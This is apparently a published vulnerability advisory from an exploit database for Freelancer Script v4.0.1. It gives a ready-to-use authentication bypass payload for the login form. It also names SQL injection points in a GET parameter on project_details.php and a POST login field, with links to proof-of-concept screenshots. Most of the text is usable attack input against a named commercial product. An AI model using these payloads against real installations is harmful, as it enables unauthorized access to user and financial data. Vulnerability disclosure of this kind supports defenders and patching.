################################################ #Title: FREELANCER SCRIPT v4.0.1 - Authentication Bypass & SQL injection #Credit: Bilal KARDADOU #Vendor: http://www.2daybiz.com #Vendor URL: http://2daybiz.com/content/products/products/job-site-script/119-freelancer-script.php #Product: FREELANCER SCRIPT v4.0.1 #Google Dork: N/A ################################################ # # Product & Service Introduction: # # Freelance script easy to manage and very simple to deploy, # comes with a web-based administrative panel has the capabilities to manage users, # financial transactions, categories and all relevant aspects of the system, with few clicks of the mouse. # # # http://localhost/freelancerscript/loginfr.php # # Username: 'or''=' # Password: 'or''=' # # # --SQL Injection-- # http://localhost/freelancerscript/project_details.php?pid=24[SQL]&title=project1 # # PoC: # http://prnt.sc/ekbqnm # # POST : # http://localhost/freelancerscript/logincheck.php # data$: uname=demo[SQL]&pwd=demo&place=log&enter=Login # # PoC: # http://prnt.sc/ekbrel # # Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127) ################################################ -- *Bilal Kardadou* IT Security Consultant *E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com | # Iranian Exploit DataBase = http://IeDb.Ir [2017-03-18]